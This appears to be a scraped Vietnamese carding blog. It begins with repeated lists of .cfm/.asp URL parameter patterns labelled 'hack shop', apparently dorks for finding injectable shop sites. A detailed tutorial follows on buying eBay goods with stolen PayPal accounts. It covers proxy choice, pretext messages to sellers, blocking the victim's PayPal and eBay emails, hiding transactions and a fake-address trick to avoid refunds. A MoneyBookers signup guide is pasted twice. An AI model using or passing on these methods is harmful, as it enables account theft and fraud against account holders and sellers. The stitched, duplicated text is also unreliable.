.cfm?PID2=
.cfm?c_id=
.cfm?recordid=
.cfm?modelid=1
.cfm?pt=
.cfm?sCurrencyCode=
catalog.cfm?a=1
productdetail.cfm?p=1
Buy_Laptop.cfm?pt=1
Computers.cfm?pt=1
displaycommon.cfm?an=1
.asp?nodeID=
.cfm?PlatformID=
.cfm?MemberID=
.cfm?adid=
lyordbank1
.cfm?JobID=111
cfm?deptid=
.cfm?EventID=
.cfm?cmkey=
.cfm?StID=
.cfm?showp=
.cfm?SubcategoryID=1
.cfm?ShopBy=
.cfm?subcategory_id=1
/index.cfm?stock=
.cfm?crit1=1
.cfm?starts_with=
.cfm?edit_id=
.cfm?categ_id=1
.cfm?icg_id=1
.asp?McatId=1
.cfm?Career_ID=
.cfm?community_id=
KeyWorld hack shop CFM Part ( 5 )
.cfm?module=
.cfm?mfr=
.asp?ManufPartNo=
.asp?symb=
.asp?navigationid=
.asp?itemno=
.asp?InvtId=
.asp?ProductCode=
.asp?InvtId=
asp?ModelNumber=1
.asp?TOPIC_ID=1
.cfm?SectionID=1
.asp?catcode=1
.cfm?menuid=
.asp?num=1
.asp?txtkey=1
.asp?CruiseID=1
.cfm?maincategory=1
.asp?dept=1
.cfm?dsp=1
.asp?storeurl=1
.asp?FCTopicID=
.cfm?id_infoalcohol=
.cfm?IDN=
.cfm?article_name=l
.cfm?mainpage=
.cfm?newsid=
.cfm?LevelID=
.cfm?linkedid=
.cfm?product_code=
cartaddto.cfm?item=
.cfm?articleid=
.cfm?subcategory=
/meetingShow.cfm?PubID=
/index.cfm?modelid=
.cfm?columnsName=
.cfm?event=
.cfm?itemno=
article.cfm?AID=
.cfm?CatDisplay=
home.cfm?r=
bookpage.asp?isbn=
KeyWorld hack shop CFM Part ( 4 )
.asp?catid=1
.asp?companyid=1
cfm?cod=1
.asp?PersonID=1
.asp?pln=1
.asp?brand=1
.asp?disp=1
asp?DealershipID=1
.cfm?method=1
.cfm?itemnum=1
.cfm?PartNumber=1
.cfm?tk=1
.cfm?ParentID=1
.asp?IK=1
.asp?PTYPE=1
.asp?PHNID=1
.asp?BRN=1
.cfm?uaction=1
.cfm?sid=
.cfm?cat=1
.cfm?PLow=
.cfm?CFID=1
.cfm?subc=
.cfm?i=1
.cfm?pq=1
.cfm?venueid=1
.cfm?owner=1
.cfm?bid=1
.cfm?StID=1
.cfm?DeptNo=1
.cfm?cat_id=1
.cfm?viewfrom=1
.cfm?indView=1
.cfm?categoryView=1
.cfm?gid=1
.cfm?detail=1
.cfm?subcategory=1
.cfm?destinationid=1
product.cfm?ProductID=1
cfm?categoryid=1
.cfm?TodoID=1
.cfm?cabinetID=1
trips.cfm?destinationid=1
KeyWorld hack shop CFM Part ( 3 )
.cfm?ArticleID=
.asp?mid=
.cfm?CFID=
.cfm?idzona=
.cfm?ZielErr=
index.cfm?smithgrind=
article.cfm?article=
book.cfm?&pid=
detail.cfm?rif=
/invoke.cfm?objectid=
/link.cfm?findcateg=
index.cfm?pagePkey=
/lista-aziende.cfm?idcat=
/cool.cfm?Selection=
Detail.cfm?said=
/corporate.cfm?IDNoteStampaFR=
/book.cfm?tab=
/viewcolumn.cfm?colid=
.asp/p=
.asp/f=
.cfm?indirizzo=
.cfm?provincia=
.asp?IdArt=
.cfm?afsrc=
.cfm?go=
.cfm?PID=
.asp?drug=
.asp?prid=
.cfm?an=
.cfm?nr=
.cfm?id2=
.cfm?rpid=1
.cfm?vid=1
.asp?st=
.asp?NID=
.asp?stateID=
.asp?DoAction=
.cfm?returnto=
.cfm?event=
.cfm?obj=
.cfm?pt=
.cfm?MerchantID=
.cfm?what=
lista-aziende.cfm?idcat=
/detail.cfm?IdNotizia=
.cfm?country=
index.cfm?id_rst=
detail.cfm?IdNotizia=
/index.cfm?release=
/infopop.cfm?classID=
leggi.cfm?art=
scheda.cfm?expID=
shop.cfm?artnr=
index.cfm?documentID=
/news_detail.cfm?newsID=
index.cfm?fuseaction=
/print-narrative.cfm?destID=
/index.cfm?sid=
/glossario.cfm?IDGlossario=
dyncat.cfm?catid=
theproducts.cfm?Owner=
theproducts.cfm?subcat=
imgindex.cfm?cat=
.cfm?Ne=1
.cfm?N=1
.cfm?ModelID=1
.cfm?viewall=1
.asp?Ntt=1`s
.cfm?Manufacturer=1
.cfm?vid=1
.cfm?fuseaction=1
.cfm?sub_site_id=1
.cfm?inc=1
.asp?contentID=1
.asp?logon=1
.asp?nid=1
orderinfo.asp?t=
cat_e.asp?N=1
.asp?ShopID=1good1
product.asp?sku=1
.asp?brandid=1
.asp?category=1
onlineCourse.asp?tID=
viewCategories.asp?idCategory=
.asp?idpage=
/shippinginfo.asp?lang=
.asp?Job_DID=
.asp?shopCode=1
product.asp?NODE_ID=
.asp?iPro=1
.asp?unacrocieramsc_id=
.asp?PND=1
,asp?c_ID=1
.asp?SValue=
.asp?tabid=
.cfm?shopping=1
DepartmentID=1
displayproducts=
.cfm?DomainID=
cityid=1
produktID=
traderid=1
shopperID=1
.cfm?passid=1
CatCode=1
.asp?scatid=1
CatName=1
CONTAINERID=
maincatid=
SKU_ID=1
subcatID=
.cfm?pagepkid=
manufacturersID=1
CFTOKEN=1
t.cfm?CFID=1
.cfm?Product_ID=1
.cfm?ProductCategory_ID=4
product_configuration_id=1
KeyWorld hack shop CFM Part ( 7 )
.asp?mscssid=1
l.asp?zone=
.asp?bei=1
.asp?redirectUrl=
.asp?catalog_name=
.cfm?xcode=1
.cfm?tlcatid=1
.asp?Post_ID=1
.asp?subcode=1
.asp?originID=
.asp?class_id=1
.asp?fScope=1
.asp?DriveID=1
.asp?AK=
.asp?XnID=
.asp?CpID=1
.asp?categ=
.asp?gen=
.asp?WebsiteID=
.asp?GroupID=1
asp?artistORD=
.asp?locationid=
.asp?idCategory=
.asp?TITEL=
.asp?FileID=
asp?IDLoja=
.asp?cadena=1
.cfm?pagina=
.cfm?palabras=
.cfm?id_ficha=
.cfm?pal_clave_rel=
.cfm?id_ficha=
.cfm?method=
asp?popsearch=
.cfm?indice=
.cfm?titulart_p=
asp?Lastname=
.asp?id_producto=1
.asp?Cadena=
.asp?comobo=
.cfm?categoryoid=1
.asp?ByBrand=1
.asp?newlang=
.asp?scat_code=1
l.asp?iPid=1
.asp?locationid=
.asp?StockID=4
.asp?idMainCategory=
t.asp?rand=
.asp?dept_id=1
.asp?t_date=1
.cfm?suppress_hdr=
.cfm?BRD=1
.cfm?top_id=
.cfm?datepub=
.cfm?site_id=
KeyWorld hack shop CFM Part ( 6 )
.asp?mygrp=1
.asp?ad_bn=1
.cfm?login_name=
.cfm?nPageNumber=
.cfm?videoid=1
asp?ProductCode=
/dvd.cfm?itemid=
asp?sorgid=
.asp?stato=
.asp?goods=
.cfm?info=
.asp?number
.cfm?cont=
.asp?Ph=
.cfm?PID2=
.cfm?c_id=
.cfm?recordid=
.cfm?modelid=1
.cfm?pt=
.cfm?sCurrencyCode=
catalog.cfm?a=1
productdetail.cfm?p=1
Buy_Laptop.cfm?pt=1
Computers.cfm?pt=1
displaycommon.cfm?an=1
.asp?nodeID=
.cfm?PlatformID=
.cfm?MemberID=
.cfm?adid=
lyordbank1
.cfm?JobID=111
cfm?deptid=
.cfm?EventID=
.cfm?cmkey=
.cfm?StID=
.cfm?showp=
.cfm?SubcategoryID=1
.cfm?ShopBy=
.cfm?subcategory_id=1
/index.cfm?stock=
.cfm?crit1=1
.cfm?starts_with=
.cfm?edit_id=
.cfm?categ_id=1
.cfm?icg_id=1
.asp?McatId=1
.cfm?Career_ID=
.cfm?community_id=
KeyWorld hack shop CFM Part ( 5 )
.cfm?module=
.cfm?mfr=
.asp?ManufPartNo=
.asp?symb=
.asp?navigationid=
.asp?itemno=
.asp?InvtId=
.asp?ProductCode=
.asp?InvtId=
asp?ModelNumber=1
.asp?TOPIC_ID=1
.cfm?SectionID=1
.asp?catcode=1
.cfm?menuid=
.asp?num=1
.asp?txtkey=1
.asp?CruiseID=1
.cfm?maincategory=1
.asp?dept=1
.cfm?dsp=1
.asp?storeurl=1
.asp?FCTopicID=
.cfm?id_infoalcohol=
.cfm?IDN=
.cfm?article_name=l
.cfm?mainpage=
.cfm?newsid=
.cfm?LevelID=
.cfm?linkedid=
.cfm?product_code=
cartaddto.cfm?item=
.cfm?articleid=
.cfm?subcategory=
/meetingShow.cfm?PubID=
/index.cfm?modelid=
.cfm?columnsName=
.cfm?event=
.cfm?itemno=
article.cfm?AID=
.cfm?CatDisplay=
home.cfm?r=
bookpage.asp?isbn=
KeyWorld hack shop CFM Part ( 4 )
.asp?catid=1
.asp?companyid=1
cfm?cod=1
.asp?PersonID=1
.asp?pln=1
.asp?brand=1
.asp?disp=1
asp?DealershipID=1
.cfm?method=1
.cfm?itemnum=1
.cfm?PartNumber=1
.cfm?tk=1
.cfm?ParentID=1
.asp?IK=1
.asp?PTYPE=1
.asp?PHNID=1
.asp?BRN=1
.cfm?uaction=1
.cfm?sid=
.cfm?cat=1
.cfm?PLow=
.cfm?CFID=1
.cfm?subc=
.cfm?i=1
.cfm?pq=1
.cfm?venueid=1
.cfm?owner=1
.cfm?bid=1
.cfm?StID=1
.cfm?DeptNo=1
.cfm?cat_id=1
.cfm?viewfrom=1
.cfm?indView=1
.cfm?categoryView=1
.cfm?gid=1
.cfm?detail=1
.cfm?subcategory=1
.cfm?destinationid=1
product.cfm?ProductID=1
cfm?categoryid=1
.cfm?TodoID=1
.cfm?cabinetID=1
trips.cfm?destinationid=1
KeyWorld hack shop CFM Part ( 3 )
.cfm?ArticleID=
.asp?mid=
.cfm?CFID=
.cfm?idzona=
.cfm?ZielErr=
index.cfm?smithgrind=
article.cfm?article=
book.cfm?&pid=
detail.cfm?rif=
/invoke.cfm?objectid=
/link.cfm?findcateg=
index.cfm?pagePkey=
/lista-aziende.cfm?idcat=
/cool.cfm?Selection=
Detail.cfm?said=
/corporate.cfm?IDNoteStampaFR=
/book.cfm?tab=
/viewcolumn.cfm?colid=
.asp/p=
.asp/f=
.cfm?indirizzo=
.cfm?provincia=
.asp?IdArt=
.cfm?afsrc=
.cfm?go=
.cfm?PID=
.asp?drug=
.asp?prid=
.cfm?an=
.cfm?nr=
.cfm?id2=
.cfm?rpid=1
.cfm?vid=1
.asp?st=
.asp?NID=
.asp?stateID=
.asp?DoAction=
.cfm?returnto=
.cfm?event=
.cfm?obj=
.cfm?pt=
.cfm?MerchantID=
.cfm?what=
lista-aziende.cfm?idcat=
/detail.cfm?IdNotizia=
.cfm?country=
index.cfm?id_rst=
detail.cfm?IdNotizia=
/index.cfm?release=
/infopop.cfm?classID=
leggi.cfm?art=
scheda.cfm?expID=
shop.cfm?artnr=
index.cfm?documentID=
/news_detail.cfm?newsID=
index.cfm?fuseaction=
/print-narrative.cfm?destID=
/index.cfm?sid=
/glossario.cfm?IDGlossario=
dyncat.cfm?catid=
theproducts.cfm?Owner=
theproducts.cfm?subcat=
imgindex.cfm?cat=
.cfm?Ne=1
.cfm?N=1
.cfm?ModelID=1
.cfm?viewall=1
.asp?Ntt=1`s
.cfm?Manufacturer=1
.cfm?vid=1
.cfm?fuseaction=1
.cfm?sub_site_id=1
Thứ Năm, 15 tháng 1, 2009
Tut Ship Ebay
Chuẩn bị:
- 1 SSH không dính BL Paypal
- 1 ACC Paypal có pass mail
- 1 acc ebay tự tạo hoặc check mail chủ paypal kiếm cũng đc (tớ toàn tự tạo Ebay ^^!), Và 1 con sock 5 không dính BL paypal nữa (Cách kiểm tra xem sock ko dính BL tớ sẽ chỉ ở dưới ^^!)
Bắt đầu nha:
Bước 1: Check Palpal (Để mà đâm em nó chứ ). check được PP + Mail pass thì thoát ra luôn. sau khi check khoảng 2-3 ngày thì mới vào pay ^^!
- Sock: dùng 1 con SSH không dính BL paypal. 1 sock ko dính bl của paypal thường như sau:
- Chạy sock, sau đó vào trang http://rapidshare.com. Click vào nút buy 1 acc mới ở ebay khi hiện ra trang thanh toán = paypal. các bạn chọn thanh toán = Credit Card. Nếu nó bắt nhập pass thì là sock…. cùi mía.
còn nếu nó không bắt nhập pass thì con sock này ngon
Tất nhiên, cách check sock này cũng là tương đối thôi ^^! tớ chưa có khẳng định cách check này là chuẩn xác nhất. Nhớ là: check được PP + Mail pass thì thoát ra, để nguyên đó. sau khi check khoảng 2-3 ngày thì mới vào pay ^^!
Khi check mail nhớ kiểm tra xem nó có hay giao dịch trên mạng không, log vào PP xem những giao dịch gần đây của nó là ngày bao nhiêu, có hay mua trên eBay không. (cái này tớ thường chọn con PP ít có giao dịch trên mạng, thường là Premier. và cũng… ít mua hàng trên eBay nữa.)
Không biết có phải do ngẫu nhiên không nhưng mà khi tớ dùng con PP có mua bán trên ebay thường tỷ lệ Led rất cao ^^!
Nếu muốn pay = con SSH này thì các bạn không được dùng nó làm bất cứ việc gì khác trong vòng 2-3 ngày cả trước và sau khi pay
Bước 2: Search Item.
VD chúng ta muốn ship 1 con Cellphone, Search trên ebay thì nhiều seller lắm nhưng cái quan trọng là nó có chịu ship về VN hay ko. Có những thằng đầu tiên không chịu ship nhưng sau khi mình contact nó lại ok
Trước hết các bạn vào Ebay (Nhớ log bằng con SSH nha ^^!), chọn Advanced Search (Xem hình ở dưới
Để giảm thời gian tìm món hàng cần mua ở đây tớ làm như sau:
VD ở đây tớ muốn Buy 1 con Iphone 8GB, Ở mục Advanced Search các bạn điền như sau:
Enter keyword or item number: Iphone 8GB
Items Priced: Min: US $300 (cái này điền vào để chọn giá thấp nhất là 300$)
Items available to : Viet Nam (Thường khi để ntn thì Item đó đã được seller accept ship wordwide)
Buying Options: Buy it now ( List những Item search ra sẽ có thể mua được luôn )
Bước 3: Tìm Seller Gà.
-Click vào item mình chọn. Để ý số Feedback của Seller (Càng nhỏ càng tốt) Seller nhiều FB cũng no ploblem. chỉ cần nó chịu ship unconfirm add
Tìm dòng “Confirm”
-Xem ở dưới chỗ nó trình bày Item Nếu nhìn đơn giản như thế này (ko nhắc gì đến việc paypal very hay là bắt confirm add cả):
-Còn như thế này thì bỏ qua nhé (tìm thằng khác. Ebay thiếu cha gì ) - Nó bắt confirm address
Bước 4: Contact Seller.
Trước tiên. khi nhìn tìm thấy 1 seller như thế bạn đừng có đâm vội. tội nghiệp nó . Contact nó trước đã. cách contact thì có nhiều cách bạn có thể xem ở dưới chỗ trình bày item. nếu nó điền email ở dưới thì hãy mail cho nó. còn không thì nhấn vào Ask seller a question:
hello seller. can you help me….
i want buy you item as the gift my friend’s birthday.
But in this week, i’m not in office
Now i’m very busy in EURO
She has some biz in Vietnam
if you can ship to her. i’ll buy.
thanks you.
Tớ thường contact như thế này và contact 1 lúc cho nhiều thằng. anh em nào giỏi tiếng Anh thì tự soạn cho mình 1 cách contact khác nhau nhé ^^!
Nếu trót lọt nó sẽ mail về cho mình 1 mail dạng như là:
Còn nếu nó ko chịu ship thì mail sẽ là:
Bước 5: Đâm.
khi mà seller đã ok ship về VN roài thì các bạn log vào eBay, tìm đến links của Item đó và dùng con sock đã check băm luôn (lúc này có thể dùng Sock 5 hoặc SSH. Miễn là không dính BL của PP là ok - tớ thường dùng nguyên con SSH. và nhớ là con sock đó phải không sử dụng trước khi pay 3 ngày và sau khi pay 3 ngày)
Khi Băm xong nhớ vào Mail của chủ thẻ, Block hết các mail có domain kiểu như: paypal.com và ebay.com, ebay.cn, ebay.co.uk, ………….. nói chung là block tất cả các email liên quan đến eBay và paypal.
sau khi thanh toán bạn hãy log vào Paypal. xóa hết tất cả các giao dịch gần đây đi (thực ra là ẩn đi thôi . Giao dịch gần nhất nó thường hiện ở dưới. rồi sau đó thoát hẳn ra ngoài.không log vào con paypal và ebay đó nữa. chờ track gửi về Mail của ebay thôi.
Khi thanh toán bạn hãy cho thằng seller thêm vài chục đô nữa. bảo nó ship nhanh cho mình thế là ok thôi ^^! sau khi ship, tớ thường send cho nó 1 mail như thế này:
Hi
i have just bought your item as the gift for my friend’s birthday and i want to know when you can ship it to him
my friend’s birthday is on july 22, just 5 days left , currently, he has some biz in Vietnam
Because i’m busy in EURO in this week
Can you ship it in today?
I want him delivered the item on july 22.
If can … thank you very much.
Plz ship it:
add của tớ ^^!
Nhớ thay đổi mấy mail tớ contact seller đi nhé ^^! để im mà dùng…. tai họa đấy vì trình English của tớ… bựa lắm
Ship eBay cũng có 1 số yếu tố hên xui: Nếu sock lởm ====> PP Limit ====> Led, chủ thẻ phát hiện ====> Đòi refund money =====> PP Limit ====> led……….. rồi vô số lý do nữa
Nhưng nếu các bạn làm theo lời tớ thì sẽ giảm rủi do led đi rất nhiều đấy.Thường là sau khi pay khoảng 24-48h là có tracking lúc ấy nhớ cho tớ ăn mừng nhé ha ha
P/s: đây chỉ là cách làm giảm khả năng Led ở ebay thôi. Chủ yếu là may mắn Anh em ai có kinh nghiệm đưa lên để tất cả cùng thảo luận nhé.Cảm ơn đã đọc bài của mình. ^^!
Tớ có 1 cách Fake add. tức là khi thằng chủ PP nó log vào xem tranfer statement (các giao dịch gần đây) sẽ thấy Shipping add là của nó khi đó đôi khi nó ko đòi refund tiền đâu, mà nó cứ để im (trường hợp chủ PP hay mua bán trên ebay thì tớ mới dùng cách này.)
Thủ thuật ở câu tớ post ở TUT trên ấy
sorry but I got some mistakes with the shiping address
i gave u my adress instead of my friend’s
U know, i wanna give her this cell phone as a gift. Him adress is xx
Đọc qua các bạn có hiểu gì ko?
tức là khi thằng seller nó accept ship to VN rồi, sau khi buy (điền add của chủ PP) mình sẽ mail cho nó 1 thư với nội dung như trên. Đại khái là:
Tôi vừa mua 1 item của bạn. số item là: xxxxxxxx
Nhưng tôi lại điền nhầm Shipping add là của tôi.
Tôi muốn bạn ship về địa chỉ của bạn tôi ở Việt Nam.
Ngày xx tháng xx là sinh nhật của anh ấy. chỉ còn xxx ngày nữa (ít ngày thôi) là đến SN của anh ấy rồi
Tôi muốn bạn ship vào địa chỉ của anh ấy ở Việt Nam, không phải địa chỉ của tôi.
Địa chỉ của anh ấy là: xxxxx (ghi địa chỉ của mình vào )
Thủ thuật ở đây là gì: Làm cho add của payment ở trong Paypal trở thành confirmed add :-” (add của chủ thẻ).
Trong khi đó địa chỉ nhận hàng lại là địa chỉ của mình và nó cũng giảm thiểu tối đa việc mình bị kiện (rủi ro). Và giảm thiểu tối đa việc Paypal Limitted add shipping là add confirmed by Paypal cơ mà :-”
Đăng Kí MoneyBookers
MoneyBookers
MoneyBookers là dịch vụ thanh toán tài chính trực tuyến, đang ngày càng phát triển rộng rãi không kém gì e-Gold mà có khi còn phổ biến hơn cả e-Gold.
Nhờ MoneyBookers bạn có thể:
chuyển tiền cho người khác thông qua địa chỉ e-mail
thanh toán tiền khi mua hàng trực tuyến (thanh toán tài chính online)
tiếp nhận tiền qua địa chỉ e-mail
chuyển tiền từ tài khoản của bạn ở trong nước vào tài khoản MoneyBookers của bạn
chuyển tiền từ tài khoản MoneyBookers của bạn vào tài khoản của bạn ở trong nước.
Mở tài khoản ở MoneyBookers.com?
Truy cập vào http://www.moneybookers.com
Mở ra cho bạn trang Moneybookers.com - bạn click vào “Register” ở góc trên bên trái
Mở ra cho bạn trang để điền thông tin đăng ký, những ô có dấu sao đỏ là bắt buộc phải điền, ví dụ: “Email*”
Đánh dấu vào ô bên cạnh hàng chữ: I signify my full acceptance of moneybookers’ General Terms & Conditions of Membership and Privacy Policy.
Chấp nhận các điều khoản của nội quy.
Click vào nút “Register”
QUAN TRỌNG:
Chỉ trong khoảnh khắc là MoneyBookers sẽ gửi cho bạn mã số vào địa chỉ e-mail, bạn phải điền mã số đó vào trang moneybookers để xác nhận địa chỉ e-mail.
Sau khi sác nhận địa chỉ e-mail thành công là bạn đã có tài khoản ỏ MoneyBookers. Địa chỉ e-mail của bạn cũng chính là tên truy cập (login) của bạn.
Để sử dụng được các tính năng ưu việt của MoneyBookers thì bạn có thể gửi tiền vào tài khoản MoneyBookers nhờ đó bạn có thể thanh toán tiền khi mua hàng trực tuyến, hoặc chuyển tiền cho người khác.
Khi bạn đã có tài khoản thì bạn có thể truy cập vào MoneyBookers.com
Để truy cập vào tài khoản ở Moneybookers.com:
1. Click vào “Login” ở phía trên, bên trái
2. Sau đó bạn điền địa chỉ e-mail, mật khẩu và điền mã số bảo mật hiện ra ở ô bên cạnh.
Làm thế nào để gửi tiền vào tài khoản ở MoneyBookers.com?
Chú ý: Hiện nay tôi sống ở Ba lan chứ không phải ở Việt nam nên những chỉ dẫn sau đây được dựa theo kinh nghiệm sử dụng tài khoản MoneyBookers của tôi ở Balan. Thực tế ở Việt nam như thế nào thì tôi không rõ. Nếu bạn nào áp dụng được những chỉ dẫn sau đây vào hoàn cảnh ở Việt nam thì cho tôi biết để phổ biến rộng rãi cho mọi người. Khi đăng ký tài khoản ở MoneyBookers có Việt nam trong phần lựa chọn quốc gia. Nếu hình thức chuyển tiền từ tài khoản MoneyBookers vào tài khoản ở Việt nam áp dụng được thì là điều đáng mừng. Vì khi chuyển khoản MoneyBookers chỉ thu có 1,80 EURO lệ phí, trong khi chuyển tiền từ e-Gold về Việt nam thông qua WESTERN UNION bị mất những 20$ lệ phí!
Sau khi truy cập (Login):
1. Bạn Click vào: “My Account”
2. Sau đó click vào “upload fund”
3. Đánh dấu vào mục: “Bank Transfer”. Tại đây có 2 cách để bạn gửi tiền vào tài khoản Moneybookers. Chuyển khoản từ tài khoản của bạn ở trong nước (moneybookers không thu lệ phí khi tiếp nhận) hoặc chuyển tiền từ thẻ tín dụng (lệ phí 3%).
Trường hợp chuyển khoản
I. Đánh dấu mục “Bank Transfer”, bạn sẽ nhận được thông tin để bạn chuyển khoản đến đâu:
Account holder: Moneybookers Ltd.
Bank: BRE Bank SA
Account number: 20114010100000327056001001
Sort / Bank Code: 11401010
Account currency: PLN
Reference: Tại đây bạn điền số ID của bạn. Điều này rất quan trọng để MoneyBookers biết là sẽ chuyển tiền vào tài khoản cho ai. Để cho chắc ăn ở chỗ này tôi còn điền thêm địa chỉ e-mail của mình (login)
Chú ý: Bạn chỉ có thể chuyển khoản từ tài khoản của chính bạn ở trong nước, không chuyển được từ tài khoản của người khác. Đó là hình thức chống tình trạng “Rửa tiền” phạm pháp
Trường hợp chuyển tiền bằng thẻ tín dụng:
Trước khi chuyển tiền bằng thẻ tín dụng thì bạn phải qua thẩm tra để MoneyBookers xác nhận được bạn là người chủ sở hữu của thẻ tín dụng đó. Có 2 cách để MoneyBookers.com thẩm tra:
Cách 1: Bạn gửi scan (ảnh quét): tấm thẻ của bạn cả 2 mặt (thẻ phải có chữ ký của bạn), chứng minh thư, hộ chiếu, bằng lái xe vào địa chỉ e-mail: service@moneybookers.com. Ỏ đầu e-mail bạn cần phải điền địa chỉ e-mai của bạn mà bạn đã đăng ký tài khoản ở MoneyBookers.
Cách 2: Bạn có thể gửi fax bản sao các giấy tờ trên - Cần nhớ là ngay ở đầu bạn phải điền địa chỉ e-mail mà bạn đã đăng ký tài khoản ỏ MoneyBookers. Dưới đây là mốt số địa chỉ fax:
UK: 0709-2042001
USA: 509-271-5556
Germany: 030-6908-8436
Netherlands: 020-524-8418
International: +44-709-2042001 or +1-509-271-5556
Trong vòng 48 giờ từ khi nhận được các giấy tờ trên MoneyBookers sẽ thẩm tra và kích hoạt tích năng chuyển khoản từ thẻ tín dụng cho bạn.
Cách 3: Khi bạn kích hoạt tính năng chuyển khoản từ tài khoản, nếu ở tài khoản đó bạn có thẻ tín dụng thì bạn có thể kích họat luôn cả thẻ tín dụng.
Moneybookers cũng phục vụ các khách hàng sống tại Việt nam bình thường như những khác hàng ở các nước khác. Như vậy là nếu bạn có tài khoản Moneybookers thì bạn có thể:
1.Chuyển tiền từ tài khoản của bạn ở ngân hàng Việt nam vào tài khoản Moneybookers của bạn: Miễn phí
2.Chuyển tiền từ tài khoản MoneyBookers của bạn vào tài khoản của bạn ở ngân hàng Việt nam: Phí chuyển tiền là 1,80 EURO cho một lần chuyển tiền.
3.Chuyển tiền từ tài khoản MoneyBookers của bạn vào tài khoản MoneyBookers của người khác: Phí chuyển tiền là 1% số tiền chuyển
MoneyBookers là dịch vụ thanh toán tài chính trực tuyến, đang ngày càng phát triển rộng rãi không kém gì e-Gold mà có khi còn phổ biến hơn cả e-Gold.
Nhờ MoneyBookers bạn có thể:
chuyển tiền cho người khác thông qua địa chỉ e-mail
thanh toán tiền khi mua hàng trực tuyến (thanh toán tài chính online)
tiếp nhận tiền qua địa chỉ e-mail
chuyển tiền từ tài khoản của bạn ở trong nước vào tài khoản MoneyBookers của bạn
chuyển tiền từ tài khoản MoneyBookers của bạn vào tài khoản của bạn ở trong nước.
Mở tài khoản ở MoneyBookers.com?
Truy cập vào http://www.moneybookers.com
Mở ra cho bạn trang Moneybookers.com - bạn click vào “Register” ở góc trên bên trái
Mở ra cho bạn trang để điền thông tin đăng ký, những ô có dấu sao đỏ là bắt buộc phải điền, ví dụ: “Email*”
Đánh dấu vào ô bên cạnh hàng chữ: I signify my full acceptance of moneybookers’ General Terms & Conditions of Membership and Privacy Policy.
Chấp nhận các điều khoản của nội quy.
Click vào nút “Register”
QUAN TRỌNG:
Chỉ trong khoảnh khắc là MoneyBookers sẽ gửi cho bạn mã số vào địa chỉ e-mail, bạn phải điền mã số đó vào trang moneybookers để xác nhận địa chỉ e-mail.
Sau khi sác nhận địa chỉ e-mail thành công là bạn đã có tài khoản ỏ MoneyBookers. Địa chỉ e-mail của bạn cũng chính là tên truy cập (login) của bạn.
Để sử dụng được các tính năng ưu việt của MoneyBookers thì bạn có thể gửi tiền vào tài khoản MoneyBookers nhờ đó bạn có thể thanh toán tiền khi mua hàng trực tuyến, hoặc chuyển tiền cho người khác.
Khi bạn đã có tài khoản thì bạn có thể truy cập vào MoneyBookers.com
Để truy cập vào tài khoản ở Moneybookers.com:
1. Click vào “Login” ở phía trên, bên trái
2. Sau đó bạn điền địa chỉ e-mail, mật khẩu và điền mã số bảo mật hiện ra ở ô bên cạnh.
Làm thế nào để gửi tiền vào tài khoản ở MoneyBookers.com?
Chú ý: Hiện nay tôi sống ở Ba lan chứ không phải ở Việt nam nên những chỉ dẫn sau đây được dựa theo kinh nghiệm sử dụng tài khoản MoneyBookers của tôi ở Balan. Thực tế ở Việt nam như thế nào thì tôi không rõ. Nếu bạn nào áp dụng được những chỉ dẫn sau đây vào hoàn cảnh ở Việt nam thì cho tôi biết để phổ biến rộng rãi cho mọi người. Khi đăng ký tài khoản ở MoneyBookers có Việt nam trong phần lựa chọn quốc gia. Nếu hình thức chuyển tiền từ tài khoản MoneyBookers vào tài khoản ở Việt nam áp dụng được thì là điều đáng mừng. Vì khi chuyển khoản MoneyBookers chỉ thu có 1,80 EURO lệ phí, trong khi chuyển tiền từ e-Gold về Việt nam thông qua WESTERN UNION bị mất những 20$ lệ phí!
Sau khi truy cập (Login):
1. Bạn Click vào: “My Account”
2. Sau đó click vào “upload fund”
3. Đánh dấu vào mục: “Bank Transfer”. Tại đây có 2 cách để bạn gửi tiền vào tài khoản Moneybookers. Chuyển khoản từ tài khoản của bạn ở trong nước (moneybookers không thu lệ phí khi tiếp nhận) hoặc chuyển tiền từ thẻ tín dụng (lệ phí 3%).
Trường hợp chuyển khoản
I. Đánh dấu mục “Bank Transfer”, bạn sẽ nhận được thông tin để bạn chuyển khoản đến đâu:
Account holder: Moneybookers Ltd.
Bank: BRE Bank SA
Account number: 20114010100000327056001001
Sort / Bank Code: 11401010
Account currency: PLN
Reference: Tại đây bạn điền số ID của bạn. Điều này rất quan trọng để MoneyBookers biết là sẽ chuyển tiền vào tài khoản cho ai. Để cho chắc ăn ở chỗ này tôi còn điền thêm địa chỉ e-mail của mình (login)
Chú ý: Bạn chỉ có thể chuyển khoản từ tài khoản của chính bạn ở trong nước, không chuyển được từ tài khoản của người khác. Đó là hình thức chống tình trạng “Rửa tiền” phạm pháp
Trường hợp chuyển tiền bằng thẻ tín dụng:
Trước khi chuyển tiền bằng thẻ tín dụng thì bạn phải qua thẩm tra để MoneyBookers xác nhận được bạn là người chủ sở hữu của thẻ tín dụng đó. Có 2 cách để MoneyBookers.com thẩm tra:
Cách 1: Bạn gửi scan (ảnh quét): tấm thẻ của bạn cả 2 mặt (thẻ phải có chữ ký của bạn), chứng minh thư, hộ chiếu, bằng lái xe vào địa chỉ e-mail: service@moneybookers.com. Ỏ đầu e-mail bạn cần phải điền địa chỉ e-mai của bạn mà bạn đã đăng ký tài khoản ở MoneyBookers.
Cách 2: Bạn có thể gửi fax bản sao các giấy tờ trên - Cần nhớ là ngay ở đầu bạn phải điền địa chỉ e-mail mà bạn đã đăng ký tài khoản ỏ MoneyBookers. Dưới đây là mốt số địa chỉ fax:
UK: 0709-2042001
USA: 509-271-5556
Germany: 030-6908-8436
Netherlands: 020-524-8418
International: +44-709-2042001 or +1-509-271-5556
Trong vòng 48 giờ từ khi nhận được các giấy tờ trên MoneyBookers sẽ thẩm tra và kích hoạt tích năng chuyển khoản từ thẻ tín dụng cho bạn.
Cách 3: Khi bạn kích hoạt tính năng chuyển khoản từ tài khoản, nếu ở tài khoản đó bạn có thẻ tín dụng thì bạn có thể kích họat luôn cả thẻ tín dụng.
Moneybookers cũng phục vụ các khách hàng sống tại Việt nam bình thường như những khác hàng ở các nước khác. Như vậy là nếu bạn có tài khoản Moneybookers thì bạn có thể:
1.Chuyển tiền từ tài khoản của bạn ở ngân hàng Việt nam vào tài khoản Moneybookers của bạn: Miễn phí
2.Chuyển tiền từ tài khoản MoneyBookers của bạn vào tài khoản của bạn ở ngân hàng Việt nam: Phí chuyển tiền là 1,80 EURO cho một lần chuyển tiền.
3.Chuyển tiền từ tài khoản MoneyBookers của bạn vào tài khoản MoneyBookers của người khác: Phí chuyển tiền là 1% số tiền chuyển
Tìm hiểu về Paypal
